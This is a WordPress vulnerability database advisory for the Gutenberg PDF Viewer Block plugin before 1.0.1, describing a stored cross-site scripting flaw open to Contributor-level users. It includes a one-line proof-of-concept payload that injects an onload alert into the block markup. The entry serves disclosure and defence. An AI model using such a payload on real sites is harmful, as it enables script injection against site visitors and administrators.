WordPress Plugin Vulnerabilities
Gutenberg PDF Viewer Block < 1.0.1 - Contributor+ Stored Cross-Site Scripting
Description
The plugin does not sanitise and escape its block, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.
Proof of Concept
<!-- wp:pdf-viewer-block/standard --> <div class="wp-block-pdf-viewer-block-standard" style="text-align:left"><div class="uploaded-pdf"><a href="https://example.com/#"onload="alert(origin)" data-width="" data-height=""></a></div></div> <!-- /wp:pdf-viewer-block/standard -->
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-20 (about 2 years ago)
Added
2021-09-20 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)